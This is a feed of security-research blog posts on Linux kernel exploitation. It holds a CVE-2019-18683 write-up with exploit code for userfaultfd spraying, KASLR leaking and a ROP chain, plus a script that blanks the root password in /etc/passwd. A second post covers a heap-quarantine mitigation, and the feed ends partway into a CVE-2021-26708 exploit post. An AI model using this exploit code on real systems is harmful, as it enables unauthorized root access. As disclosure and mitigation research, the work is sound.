There is an excellent post by Vitaly Nikolenko, in which he shares a very powerful technique that uses userfaultfd() and setxattr() for exploiting use-after-free in the Linux kernel. I highly recommend reading that article before proceeding with my write-up. The main idea is that userfaultfd() gives you control over the lifetime of data that is allocated by setxattr() in the kernelspace. I used that trick in various forms for exploiting this vulnerability.

As I described earlier, the vb2_buffer is freed on streaming stop and is used later, on the next streaming start. That is very convenient -- my heap spray can simply go at the end of the racing loop iteration! But there is one catch: the vulnerable vb2_buffer is not the last one freed by __vb2_queue_free(). In other words, the next kmalloc() doesn't return the needed pointer. That's why having only one allocation is not enough for overwriting the vulnerable object, making it important to really "spray".

That is not so easy with Vitaly's technique: the spraying process with setxattr()hangs until the userfaultfd() page fault handler calls the UFFDIO_COPY ioctl. If we want the setxattr() allocations to be persistent, we should never call this ioctl. I bypassed that restriction by creating a pool of pthreads: each spraying pthread calls setxattr() powered by userfaultfd()and hangs. I also distribute spraying pthreads among different CPUs using sched_setaffinity() to make allocations in all slab caches (they are per-CPU).

And now let's continue with describing the payload that I created for overwriting the vulnerable vb2_buffer.

I'm going to tell you about the development of the payload in chronological order.

Control flow hijack for V4L2 subsystem

V4L2 is a very complex Linux kernel subsystem. The following diagram (not to scale) describes the relationships between the objects that are part of the subsystem:


After my heap spray started to work fine, I spent a lot of (painful) time searching for a good exploit primitive that I could get with a vb2_buffer under my control. Unfortunately, I didn't manage to create an arbitrary write by crafting vb2_buffer.planes. Later I found a promising function pointer: vb2_buffer.vb2_queue->mem_ops->vaddr. Its prototype is pure luxury, I'd say!

Moreover, when vaddr() is called, it takes vb2_buffer.planes[0].mem_priv as an argument.

Unexpected troubles: kthread context

After discovering vb2_mem_ops.vaddr I started to investigate the minimal payload needed for me to get the V4L2 code to reach this function pointer.

First of all I disabled SMAP (Supervisor Mode Access Prevention), SMEP (Supervisor Mode Execution Prevention), and KPTI (Kernel Page-Table Isolation). Then I made vb2_buffer.vb2_queue point to the mmap'ed memory area in the userspace. Dereferencing that pointer was giving an error: "unable to handle page fault". It turned out that the pointer is dereferenced in the kernel thread context, where my userspace is not mapped at all.

So constructing the payload became a sticking point: I needed to place vb2_queue and vb2_mem_ops at known memory addresses that can be accessed from the kthread context.

Insight -- that's why we do it

During these experiments I dropped my kernel code changes that I had developed for deeper fuzzing. And I saw that my PoC exploit hit some V4L2 warning before performing use-after-free. This is the code in __vb2_queue_cancel() that gives the warning:

/* * If you see this warning, then the driver isn't cleaning up properly * in stop_streaming(). See the stop_streaming() documentation in * videobuf2-core.h for more information how buffers should be returned * to vb2 in stop_streaming(). */ if (WARN_ON(atomic_read(&q->owned_by_drv_count))) {

I realized that I could parse the kernel warning information (which is available to regular users on Ubuntu Server). But I didn't know what to do with it. After some time I decided to ask my friend Andrey Konovalov aka xairy who is a well-known Linux kernel security researcher. He presented me with a cool idea -- to put the payload on the kernel stack and hold it there using userfaultfd(), similarly to Vitaly's heap spray. We can do this with any syscall that moves data to the kernel stack using copy_from_user(). I believe this to be a novel technique, so I will refer it to as xairy's method to credit my friend.

I understood that I could get the kernel stack location by parsing the warning and then anticipate the future address of my payload. This was the most sublime moment of my entire quest. These are the moments that make all the effort worth it, right?

Now let's collect all the exploit steps together before describing the payload bytes. The described method allows bypassing SMAP, SMEP, and KASLR on Ubuntu Server 18.04.

Exploit orchestra

For this quite complex exploit I created a pool of pthreads and orchestrated them using synchronization at pthread_barriers. Here are the pthread_barriers that mark the main reference points during exploitation:

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) #define THREADS_N 50 pthread_barrier_t barrier_prepare; pthread_barrier_t barrier_race; pthread_barrier_t barrier_parse; pthread_barrier_t barrier_kstack; pthread_barrier_t barrier_spray; pthread_barrier_t barrier_fatality; ... ret = pthread_barrier_init(&barrier_prepare, NULL, THREADS_N - 3); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_race, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_parse, NULL, 3); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_kstack, NULL, 3); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_spray, NULL, THREADS_N - 5); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_fatality, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init");

Each pthread has a special role. In this particular exploit I have 50 pthreads in five different roles:

  •  2 racer pthreads
  •  (THREADS_N - 6) = 44 sprayer pthreads, which hang on setxattr() powered by userfaultfd()
  •  2 pthreads for userfaultfd() page fault handling
  •  1 pthread for parsing /dev/kmsg and adapting the payload
  •  1 fatality pthread, which triggers the privilege escalation

The pthreads with different roles synchronize at a different set of barriers. The last parameter of pthread_barrier_init() specifies the number of pthreads that must call pthread_barrier_wait() for that particular barrier before they can continue all together.


The following table describes all the pthreads of this exploit, their work, and synchronization via pthread_barrier_wait(). The barriers are listed in chronological order. The table is best read row by row, remembering that all the pthreads work in parallel.



Here is the exploit debug output perfectly demonstrating the workflow described in the table:

a13x@ubuntu_server_1804:~$ uname -a Linux ubuntu_server_1804 4.15.0-66-generic #75-Ubuntu SMP Tue Oct 1 05:24:09 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux a13x@ubuntu_server_1804:~$ a13x@ubuntu_server_1804:~$ ./v4l2-pwn begin as: uid=1000, euid=1000 Prepare the payload: [+] payload for_heap is mmaped to 0x7f8c9e9b0000 [+] vivid_buffer of size 504 is at 0x7f8c9e9b0e08 [+] payload for_stack is mmaped to 0x7f8c9e9ae000 [+] timex of size 208 is at 0x7f8c9e9aef38 [+] userfaultfd #1 is configured: start 0x7f8c9e9b1000, len 0x1000 [+] userfaultfd #2 is configured: start 0x7f8c9e9af000, len 0x1000 We have 4 CPUs for racing; now create 50 pthreads... [+] racer 1 is ready on CPU 1 [+] fatality is ready [+] racer 0 is ready on CPU 0 [+] fault_handler for uffd 3 is ready [+] kmsg parser is ready [+] fault_handler for uffd 4 is ready [+] 44 sprayers are ready (passed the barrier) Racer 1: GO! Racer 0: GO! [+] found rsp "ffffb93600eefd60" in kmsg [+] kernel stack top is 0xffffb93600ef0000 [+] found r11 "ffffffff9d15d80d" in kmsg [+] kaslr_offset is 0x1a800000 Adapt payloads knowing that kstack is 0xffffb93600ef0000, kaslr_offset 0x1a800000: vb2_queue of size 560 will be at 0xffffb93600eefe30, userspace 0x7f8c9e9aef38 mem_ops ptr will be at 0xffffb93600eefe68, userspace 0x7f8c9e9aef70, value 0xffffb93600eefe70 mem_ops struct of size 120 will be at 0xffffb93600eefe70, userspace 0x7f8c9e9aef78, vaddr 0xffffffff9bc725f1 at 0x7f8c9e9aefd0 rop chain will be at 0xffffb93600eefe80, userspace 0x7f8c9e9aef88 cmd will be at ffffb93600eefedc, userspace 0x7f8c9e9aefe4 [+] the payload for kernel heap and stack is ready. Put it. [+] UFFD_EVENT_PAGEFAULT for uffd 4 on address = 0x7f8c9e9af000: 2 faults collected [+] fault_handler for uffd 4 passed the barrier [+] UFFD_EVENT_PAGEFAULT for uffd 3 on address = 0x7f8c9e9b1000: 44 faults collected [+] fault_handler for uffd 3 passed the barrier [+] and now fatality: run the shell command as root!

Anatomy of the exploit payload

In the previous section, I described orchestration of the exploit pthreads. I mentioned that the exploit payload is created in two locations:

  1. In the kernel heap by sprayer pthreads using setxattr() syscall powered by userfaultfd().
  2. In the kernel stack by racer pthreads using adjtimex() syscall powered by userfaultfd(). That syscall is chosen because it performs copy_from_user() to the kernel stack.

The exploit payload consists of three parts:

  1. vb2_buffer in kernel heap
  2. vb2_queue in kernel stack
  3. vb2_mem_ops in kernel stack

Now see the code that creates this payload. At the beginning of the exploit, I prepare the payload contents in the userspace.

That memory is for the setxattr() syscall, which will put it on the kernel heap:

#define MMAP_SZ 0x2000 #define PAYLOAD_SZ 504 void init_heap_payload() { struct vivid_buffer *vbuf = NULL; struct vb2_plane *vplane = NULL; for_heap = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (for_heap == MAP_FAILED) err_exit("[-] mmap"); printf(" [+] payload for_heap is mmaped to %p\n", for_heap); /* Don't touch the second page (needed for userfaultfd) */ memset(for_heap, 0, PAGE_SIZE); xattr_addr = for_heap + PAGE_SIZE - PAYLOAD_SZ; vbuf = (struct vivid_buffer *)xattr_addr; vbuf->vb.vb2_buf.num_planes = 1; vplane = vbuf->vb.vb2_buf.planes; vplane->bytesused = 16; vplane->length = 16; vplane->min_length = 16; printf(" [+] vivid_buffer of size %lu is at %p\n", sizeof(struct vivid_buffer), vbuf);

And that memory is for the adjtimex() syscall, which will put it on the kernel stack:

#define PAYLOAD2_SZ 208 void init_stack_payload() { for_stack = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (for_stack == MAP_FAILED) err_exit("[-] mmap"); printf(" [+] payload for_stack is mmaped to %p\n", for_stack); /* Don't touch the second page (needed for userfaultfd) */ memset(for_stack, 0, PAGE_SIZE); timex_addr = for_stack + PAGE_SIZE - PAYLOAD2_SZ + 8; printf(" [+] timex of size %lu is at %p\n", sizeof(struct timex), timex_addr); }

As I described earlier, after hitting the race condition the kmsg parsing pthread extracts the following information from the kernel warning:

  • The RSP value to calculate the address of kernel stack top.
  • The R11 value that points to some constant location in the kernel code. This value helps to calculate the KASLR offset:

#define R11_COMPONENT_TO_KASLR_OFFSET 0x195d80d #define KERNEL_TEXT_BASE 0xffffffff81000000 kaslr_offset = strtoul(r11, NULL, 16); kaslr_offset -= R11_COMPONENT_TO_KASLR_OFFSET; if (kaslr_offset < KERNEL_TEXT_BASE) { printf("bad kernel text base 0x%lx\n", kaslr_offset); err_exit("[-] kmsg parsing for r11"); } kaslr_offset -= KERNEL_TEXT_BASE;
 
Then the kmsg parsing pthread adapts the heap and stack payload. The most interesting and complex part! To understand it have a look at the debug output of this code (posted above).

#define TIMEX_STACK_OFFSET 0x1d0 #define LIST_OFFSET 24 #define OPS_OFFSET 64 #define CMD_OFFSET 172 struct vivid_buffer *vbuf = (struct vivid_buffer *)xattr_addr; struct vb2_queue *vq = NULL; struct vb2_mem_ops *memops = NULL; struct vb2_plane *vplane = NULL; printf("Adapt payloads knowing that kstack is 0x%lx, kaslr_offset 0x%lx:\n", kstack, kaslr_offset); /* point to future position of vb2_queue in timex payload on kernel stack */ vbuf->vb.vb2_buf.vb2_queue = (struct vb2_queue *)(kstack - TIMEX_STACK_OFFSET); vq = (struct vb2_queue *)timex_addr; printf(" vb2_queue of size %lu will be at %p, userspace %p\n", sizeof(struct vb2_queue), vbuf->vb.vb2_buf.vb2_queue, vq); /* just to survive vivid list operations */ vbuf->list.next = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET); vbuf->list.prev = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET); /* * point to future position of vb2_mem_ops in timex payload on kernel stack; * mem_ops offset is 0x38, be careful with OPS_OFFSET */ vq->mem_ops = (struct vb2_mem_ops *)(kstack - TIMEX_STACK_OFFSET + OPS_OFFSET); printf(" mem_ops ptr will be at %p, userspace %p, value %p\n", &(vbuf->vb.vb2_buf.vb2_queue->mem_ops), &(vq->mem_ops), vq->mem_ops); memops = (struct vb2_mem_ops *)(timex_addr + OPS_OFFSET); /* vaddr offset is 0x58, be careful with ROP_CHAIN_OFFSET */ memops->vaddr = (void *)ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET + kaslr_offset; printf(" mem_ops struct of size %lu will be at %p, userspace %p, vaddr %p at %p\n", sizeof(struct vb2_mem_ops), vq->mem_ops, memops, memops->vaddr, &(memops->vaddr));

And the following diagram describes how the adapted payload parts are interconnected in the kernel memory:


ROP'n'JOP

Now I'm going to tell about the ROP chain that I created for these special circumstances.

As you can see, I've found an excellent stack-pivoting gadget that fits to void *(*vaddr)(void *buf_priv, where the control flow is hijacked. The buf_priv argument is taken from the vb2_plane.mem_priv, which is under our control. In the Linux kernel on x86_64, the first function argument is passed via the RDI register. So the sequence push rdi; pop rsp switches the stack pointer to the controlled location (it is on the kernel stack as well, so SMAP and SMEP are bypassed).

Then comes the ROP chain for local privilege escalation. It is unusual because it is executed in the kernel thread context (as described earlier in this write-up).

#define ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET 0xffffffff814725f1 #define ROP__POP_R15__RET 0xffffffff81084ecf #define ROP__POP_RDI__RET 0xffffffff8101ef05 #define ROP__JMP_R15 0xffffffff81c071be #define ADDR_RUN_CMD 0xffffffff810b4ed0 #define ADDR_DO_TASK_DEAD 0xffffffff810bf260 unsigned long *rop = NULL; char *cmd = "/bin/sh /home/a13x/pwn"; /* rewrites /etc/passwd dropping root pwd */ size_t cmdlen = strlen(cmd) + 1; /* for 0 byte */ /* mem_priv is the arg for vaddr() */ vplane = vbuf->vb.vb2_buf.planes; vplane->mem_priv = (void *)(kstack - TIMEX_STACK_OFFSET + ROP_CHAIN_OFFSET); rop = (unsigned long *)(timex_addr + ROP_CHAIN_OFFSET); printf(" rop chain will be at %p, userspace %p\n", vplane->mem_priv, rop); strncpy((char *)timex_addr + CMD_OFFSET, cmd, cmdlen); printf(" cmd will be at %lx, userspace %p\n", (kstack - TIMEX_STACK_OFFSET + CMD_OFFSET), (char *)timex_addr + CMD_OFFSET); /* stack will be trashed near rop chain, be careful with CMD_OFFSET */ *rop++ = 0x1337133713371337; /* placeholder for pop rbp in the pivoting gadget */ *rop++ = ROP__POP_R15__RET + kaslr_offset; *rop++ = ADDR_RUN_CMD + kaslr_offset; *rop++ = ROP__POP_RDI__RET + kaslr_offset; *rop++ = (unsigned long)(kstack - TIMEX_STACK_OFFSET + CMD_OFFSET); *rop++ = ROP__JMP_R15 + kaslr_offset; *rop++ = ROP__POP_R15__RET + kaslr_offset; *rop++ = ADDR_DO_TASK_DEAD + kaslr_offset; *rop++ = ROP__JMP_R15 + kaslr_offset; printf(" [+] the payload for kernel heap and stack is ready. Put it.\n");

This ROP chain loads the address of the kernel function run_cmd() from kernel/reboot.c to the R15 register. Then it saves the address of the shell command to the RDI register. That address will be passed to run_cmd() as an argument. Then the ROP chain performs some JOP'ing :) It jumps to run_cmd() that executes /bin/sh /home/a13x/pwn with root privileges. That script rewrites /etc/passwd allowing to login as root without a password:

#!/bin/sh # drop root password sed -i '1s/.*/root::0:0:root:\/root:\/bin\/bash/' /etc/passwd

Then the ROP chain jumps to __noreturn do_task_dead() from kernel/exit.c. I do so for so-called system fixating: if this kthread is not stopped, it provokes some unnecessary kernel crashes.

Possible exploit mitigation

There are several kernel hardening features that could interfere with different parts of this exploit.

1. Setting /proc/sys/vm/unprivileged_userfaultfd to 0 would block the described method of keeping the payload in the kernelspace. That toggle restricts userfaultfd() to only privileged users (with SYS_CAP_PTRACE capability).

2. Setting kernel.dmesg_restrict sysctl to 1 would block the infoleak via kernel log. That sysctl restricts the ability of unprivileged users to read the kernel syslog via dmesg. However, even with kernel.dmesg_restrict = 1, Ubuntu users from the adm group can read the kernel log from /var/log/syslog.

3. grsecurity/PaX patch has an interesting feature called PAX_RANDKSTACK, which would make the exploit guess the vb2_queue location:

+config PAX_RANDKSTACK + bool "Randomize kernel stack base" + default y if GRKERNSEC_CONFIG_AUTO && !(GRKERNSEC_CONFIG_VIRT_HOST && GRKERNSEC_CONFIG_VIRT_VIRTUALBOX) + depends on X86_TSC && X86 + help + By saying Y here the kernel will randomize every task's kernel + stack on every system call. This will not only force an attacker + to guess it but also prevent him from making use of possible + leaked information about it. + + Since the kernel stack is a rather scarce resource, randomization + may cause unexpected stack overflows, therefore you should very + carefully test your system. Note that once enabled in the kernel + configuration, this feature cannot be disabled on a per file basis. +

 4. PAX_RAP from grsecurity/PaX patch should prevent my ROP/JOP chain that is described above.

 5. Hopefully in future Linux kernel will have ARM Memory Tagging Extension (MTE) support, which will mitigate use-after-free similar to one I exploited.

Conclusion

Investigating and fixing CVE-2019-18683, developing the PoC exploit, and writing this article has been a big deal for me.

I hope you have enjoyed reading it.

I want to thank Positive Technologies for giving me the opportunity to work on this research.

I would appreciate the feedback.

Author: Alexander Popov, Positive Technologies

Linux kernel heap quarantine versus use-after-free exploits

$
0
0

It's 2020. Quarantines are everywhere – and here I'm writing about one, too. But this quarantine is of a different kind.

In this article I'll describe the Linux Kernel Heap Quarantine that I developed for mitigating kernel use-after-free exploitation. I will also summarize the discussion about the prototype of this security feature on the Linux Kernel Mailing List (LKML).


Use-after-free in the Linux kernel

Use-after-free (UAF) vulnerabilities in the Linux kernel are very popular for exploitation. There are many exploit examples, some of them include:

UAF exploits usually involve heap spraying. Generally speaking, this technique aims to put attacker-controlled bytes at a defined memory location on the heap. Heap spraying for exploiting UAF in the Linux kernel relies on the fact that when kmalloc() is called, the slab allocator returns the address of memory that was recently freed:


So allocating a kernel object with the same size and attacker-controlled contents allows overwriting the vulnerable freed object:


Note: Heap spraying for out-of-bounds exploitation is a separate technique.

An idea

In July 2020, I got an idea of how to break this heap spraying technique for UAF exploitation. In August I found some time to try it out. I extracted the slab freelist quarantine from KASAN functionality and called it SLAB_QUARANTINE.

If this feature is enabled, freed allocations are stored in the quarantine queue, where they wait to be actually freed. So there should be no way for them to be instantly reallocated and overwritten by UAF exploits. In other words, with SLAB_QUARANTINE, the kernel allocator behaves like so:


On August 13, I sent the first early PoC to LKML and started deeper research of its security properties.

Slab quarantine security properties

For researching the security properties of the kernel heap quarantine, I developed two lkdtm tests (code is available here).

The first test is called lkdtm_HEAP_SPRAY. It allocates and frees an object from a separate kmem_cache and then allocates 400,000 similar objects. In other words, this test attempts an original heap spraying technique for UAF exploitation:

#define SPRAY_LENGTH 400000

    ...

    addr = kmem_cache_alloc(spray_cache, GFP_KERNEL);

    ...

    kmem_cache_free(spray_cache, addr);

    pr_info("Allocated and freed spray_cache object %p of size %d\n",

                    addr, SPRAY_ITEM_SIZE);

    ...

    pr_info("Original heap spraying: allocate %d objects of size %d...\n",

                    SPRAY_LENGTH, SPRAY_ITEM_SIZE);

    for (i =0; i < SPRAY_LENGTH; i++) {

        spray_addrs[i] = kmem_cache_alloc(spray_cache, GFP_KERNEL);

        ...

        if (spray_addrs[i] == addr) {

            pr_info("FAIL: attempt %lu: freed object is reallocated\n", i);

            break;

        }

    }

    

    if (i == SPRAY_LENGTH)

        pr_info("OK: original heap spraying hasn't succeeded\n");

If CONFIG_SLAB_QUARANTINE is disabled, the freed object is instantly reallocated and overwritten:

# echo HEAP_SPRAY > /sys/kernel/debug/provoke-crash/DIRECT

   lkdtm: Performing direct entry HEAP_SPRAY

   lkdtm: Allocated and freed spray_cache object 000000002b5b3ad4 of size 333

   lkdtm: Original heap spraying: allocate 400000 objects of size 333...

   lkdtm: FAIL: attempt 0: freed object is reallocated

If CONFIG_SLAB_QUARANTINE is enabled, 400,000 new allocations don't overwrite the freed object:

# echo HEAP_SPRAY > /sys/kernel/debug/provoke-crash/DIRECT

   lkdtm: Performing direct entry HEAP_SPRAY

   lkdtm: Allocated and freed spray_cache object 000000009909e777 of size 333

   lkdtm: Original heap spraying: allocate 400000 objects of size 333...

   lkdtm: OK: original heap spraying hasn't succeeded

That happens because pushing an object through the quarantine requires both allocating and freeing memory. Objects are released from the quarantine as new memory is allocated, but only when the quarantine size is over the limit. And the quarantine size grows when more memory is freed up.

That's why I created the second test, called lkdtm_PUSH_THROUGH_QUARANTINE. It allocates and frees an object from a separate kmem_cache and then performs kmem_cache_alloc()+kmem_cache_free() for that cache 400,000 times.

addr = kmem_cache_alloc(spray_cache, GFP_KERNEL);

    ...

    kmem_cache_free(spray_cache, addr);

    pr_info("Allocated and freed spray_cache object %p of size %d\n",

                    addr, SPRAY_ITEM_SIZE);

 

    pr_info("Push through quarantine: allocate and free %d objects of size %d...\n",

                    SPRAY_LENGTH, SPRAY_ITEM_SIZE);

    for (i =0; i < SPRAY_LENGTH; i++) {

        push_addr = kmem_cache_alloc(spray_cache, GFP_KERNEL);

        ...

        kmem_cache_free(spray_cache, push_addr);

 

        if (push_addr == addr) {

            pr_info("Target object is reallocated at attempt %lu\n", i);

            break;

        }

    }

 

    if (i == SPRAY_LENGTH) {

        pr_info("Target object is NOT reallocated in %d attempts\n",

                    SPRAY_LENGTH);

    }

This test effectively pushes the object through the heap quarantine and reallocates it after it returns back to the allocator freelist:

  # echo PUSH_THROUGH_QUARANTINE > /sys/kernel/debug/provoke-crash/

   lkdtm: Performing direct entry PUSH_THROUGH_QUARANTINE

   lkdtm: Allocated and freed spray_cache object 000000008fdb15c3 of size 333

   lkdtm: Push through quarantine: allocate and free 400000 objects of size 333...

   lkdtm: Target object is reallocated at attempt 182994

  # echo PUSH_THROUGH_QUARANTINE > /sys/kernel/debug/provoke-crash/

   lkdtm: Performing direct entry PUSH_THROUGH_QUARANTINE

   lkdtm: Allocated and freed spray_cache object 000000004e223cbe of size 333

   lkdtm: Push through quarantine: allocate and free 400000 objects of size 333...

   lkdtm: Target object is reallocated at attempt 186830

  # echo PUSH_THROUGH_QUARANTINE > /sys/kernel/debug/provoke-crash/

   lkdtm: Performing direct entry PUSH_THROUGH_QUARANTINE

   lkdtm: Allocated and freed spray_cache object 000000007663a058 of size 333

   lkdtm: Push through quarantine: allocate and free 400000 objects of size 333...

   lkdtm: Target object is reallocated at attempt 182010

As you can see, the number of the allocations needed for overwriting the vulnerable object is almost the same. That would be good for stable UAF exploitation and should not be allowed. That's why I developed quarantine randomization. This randomization required very small hackish changes to the heap quarantine mechanism.

The heap quarantine stores objects in batches. On startup, all quarantine batches are filled by objects. When the quarantine shrinks, I randomly choose and free half of objects from a randomly chosen batch. The randomized quarantine then releases the freed object at an unpredictable moment:

   lkdtm: Target object is reallocated at attempt 107884

   lkdtm: Target object is reallocated at attempt 265641

   lkdtm: Target object is reallocated at attempt 100030

   lkdtm: Target object is NOT reallocated in 400000 attempts

   lkdtm: Target object is reallocated at attempt 204731

   lkdtm: Target object is reallocated at attempt 359333

   lkdtm: Target object is reallocated at attempt 289349

   lkdtm: Target object is reallocated at attempt 119893

   lkdtm: Target object is reallocated at attempt 225202

   lkdtm: Target object is reallocated at attempt 87343

However, this randomization alone would not stop the attacker: the quarantine stores the attacker's data (the payload) in the sprayed objects! This means the reallocated and overwritten vulnerable object contains the payload until the next reallocation (very bad!).

This makes it important to erase heap objects before placing them in the heap quarantine. Moreover, filling them with zeros gives a chance to detect UAF accesses to non-zero data for as long as an object stays in the quarantine (nice!). That functionality already exists in the kernel, it's called init_on_free. I integrated it with CONFIG_SLAB_QUARANTINE as well.

During that work I found a bug: in CONFIG_SLAB, init_on_free happens too late. Heap objects go to the KASAN quarantine while still "dirty." I provided the fix in a separate patch.

For a deeper understanding of the heap quarantine's inner workings, I provided an additional patch, which contains verbose debugging (not for merge). It's very helpful, see the output example:

  quarantine: PUT 508992 to tail batch 123, whole sz 65118872, batch sz 508854

   quarantine: whole sz exceed max by 494552, REDUCE head batch 0 by 415392, leave 396304

   quarantine: data level in batches:

     0 - 77%

     1 - 108%

     2 - 83%

     3 - 21%

   ...

     125 - 75%

     126 - 12%

     127 - 108%

   quarantine: whole sz exceed max by 79160, REDUCE head batch 12 by 14160, leave 17608

   quarantine: whole sz exceed max by 65000, REDUCE head batch 75 by 218328, leave 195232

   quarantine: PUT 508992 to tail batch 124, whole sz 64979984, batch sz 508854

   ...

The heap quarantine PUT operation you see in this output happens during kernel memory freeing. The heap quarantine REDUCE operation happens during kernel memory allocation, if the quarantine size limit is exceeded. The kernel objects released from the heap quarantine return to the allocator freelist – they are actually freed. In this output, you can also see that on REDUCE, the quarantine releases some part of a randomly chosen object batch (see the randomization patch for more details).

What about performance?

I made brief performance tests of the quarantine PoC on real hardware and in virtual machines:

1. Network throughput test using iperf

server: iperf -s -f K

client: iperf -c 127.0.0.1 -t 60 -f K

2. Scheduler stress test

hackbench -s 4000 -l 500 -g 15 -f 25 -P

3. Building the defconfig kernel

time make -j2

I compared vanilla Linux kernel in three modes:

  • init_on_free=off
  • init_on_free=on (upstreamed feature)
  • CONFIG_SLAB_QUARANTINE=y (which enables init_on_free)

Network throughput test with iperf showed that:

  • init_on_free=on gives 28.0 percent less throughput compared to init_on_free=off.
  • CONFIG_SLAB_QUARANTINE gives 2.0 percent less throughput compared to init_on_free=on.

Scheduler stress test:

  • With init_on_free=on, hackbench worked 5.3 percent slower versus init_on_free=off.
  • With CONFIG_SLAB_QUARANTINE, hackbench worked 91.7 percent slower versus init_on_free=on. Running this test in a QEMU/KVM virtual machine gave a 44.0 percent performance penalty, which is quite different from the results on real hardware (Intel Core i7-6500U CPU).

Building the defconfig kernel:

  • With init_on_free=on, the kernel build went 1.7 percent more slowly compared to init_on_free=off.
  • With CONFIG_SLAB_QUARANTINE, the kernel build was 1.1 percent slower compared to init_on_free=on.

As you can see, the results of these tests are quite diverse and depend on the type of workload.

Sidenote: There was NO performance optimization for this version of the heap quarantine prototype. My main effort was put into researching its security properties. I decided that performance optimization should be done further on down the road, assuming that my work is worth pursuing.

Сounter-attack

My patch series got feedback on the LKML. I'm grateful to Kees Cook, Andrey Konovalov, Alexander Potapenko, Matthew Wilcox, Daniel Micay, Christopher Lameter, Pavel Machek, and Eric W. Biederman for their analysis.

And the main kudos go to Jann Horn, who reviewed the security properties of my slab quarantine mitigation and created a counter-attack that re-enabled UAF exploitation in the Linux kernel.

Amazingly, that discussion with Jann happened during Kees's Twitch stream in which he was testing my patch series (by the way, I recommend watching the recording).

Quoting the mailing list:

On 06.10.2020 21:37, Jann Horn wrote:

> On Tue, Oct 6, 2020 at 7:56 PM Alexander Popov wrote:

>> So I think the control over the time of the use-after-free access doesn't help

>> attackers, if they don't have an "infinite spray" -- unlimited ability to store

>> controlled data in the kernelspace objects of the needed size without freeing them.

   [...]

>> Would you agree?

>

> But you have a single quarantine (per CPU) for all objects, right? So

> for a UAF on slab A, the attacker can just spam allocations and

> deallocations on slab B to almost deterministically flush everything

> in slab A back to the SLUB freelists?

 

Aaaahh! Nice shot Jann, I see.

 

Another slab cache can be used to flush the randomized quarantine, so eventually

the vulnerable object returns into the allocator freelist in its cache, and

original heap spraying can be used again.


For now I think the idea of a global quarantine for all slab objects is dead.

I shared that in Kees's Twitch stream chat right away, and Kees adapted my PUSH_THROUGH_QUARANTINE test to implement this attack. It worked. Bang!

Further ideas

Jann proposed another idea for mitigating UAF exploitation in the Linux kernel. Kees, Daniel Micay, Christopher Lameter, and Matthew Wilcox commented on it. I'll give a few quotes from consecutive messages here to describe the idea. However, I recommend reading the whole discussion.

Jann:

Things like preventing the reallocation of virtual kernel addresses

  with different types, such that an attacker can only replace a UAF object

  with another object of the same type.

  ...

  And, to make it more effective, something like a compiler plugin to

  isolate kmalloc(sizeof(<type>)) allocations by type beyond just size

  classes.

Kees:

  The large trouble are the kmalloc caches, which don't have types

  associated with them. Having implicit kmem caches based on the type

  being allocated there would need some pretty extensive plumbing, I

  think?

Jann:

You'd need to teach the compiler frontend to grab type names from

  sizeof() and stuff that type information somewhere, e.g. by generating

  an extra function argument referring to the type, or something like that.

Daniel:

It will reuse the memory for other things when the whole slab is freed

  though. Not really realistic to change that without it being backed by

  virtual memory along with higher-level management of regions to avoid

  intense fragmentation and metadata waste. It would depend a lot on

  having much finer-grained slab caches.

Christopher:

  Actually typifying those accesses may get rid of a lot of kmalloc

  allocations and could help to ease the management and control of objects.

  

  It may be a big task though given the ubiquity of kmalloc and the need to

  create a massive amount of new slab caches. This is going to reduce the

  cache hit rate significantly.

Conclusion

Prototyping a Linux kernel heap quarantine and testing it against use-after-free exploitation techniques was a quick and interesting research project. It didn't turn into a final solution suitable for the mainline, but it did give us useful results and ideas. I've written this article as a way to summarize these efforts for future reference.

And for now, let me finish with a tiny poem that I composed several days ago before going to sleep:

  Quarantine patch version three

  Won't appear. No need.

  Let's exploit use-after-free

  Like we always did ;)

  

        -- a13xp0p0v

Author: Alexander Popov, Positive Technologies


Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel

$
0
0
Author: Alexander Popov, Positive Technologies

CVE-2021-26708 is assigned to five race condition bugs in the virtual socket implementation of the Linux kernel. I discovered and fixed them in January 2021. In this article I describe how to exploit them for local privilege escalation on Fedora 33 Server for x86_64, bypassing SMEP and SMAP. Today I gave a talk at Zer0Con 2021 on this topic (slides).


I like this exploit. The race condition can be leveraged for very limited memory corruption, which I gradually turn into arbitrary read/write of kernel memory, and ultimately full power over the system. That's why I titled this article "Four Bytes of Power."

Now the PoC demo video:

Vulnerabilities

These vulnerabilities are race conditions caused by faulty locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in November 2019 in the commits that added VSOCK multi-transport support. These commits were merged into Linux kernel version 5.5-rc1.

CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are shipped as kernel modules in all major GNU/Linux distributions. The vulnerable modules are automatically loaded when you create a socket for the AF_VSOCK domain:

    vsock = socket(AF_VSOCK, SOCK_STREAM, 0);

AF_VSOCK socket creation is available to unprivileged users without requiring user namespaces. Neat, right?

Bugs and fixes

I use the syzkaller fuzzer with custom modifications. On January 11, I saw that it got a suspicious kernel crash in virtio_transport_notify_buffer_size(). However, the fuzzer didn't manage to reproduce this crash, so I started inspecting the source code and developing the reproducer manually.

A few days later I found a confusing bug in vsock_stream_setsockopt() that looked intentional:

    struct sock *sk;

    struct vsock_sock *vsk;

    conststructvsock_transport *transport;

 

    /* ... */

 

    sk = sock->sk;

    vsk =vsock_sk(sk);

    transport =vsk->transport;

 

    lock_sock(sk);

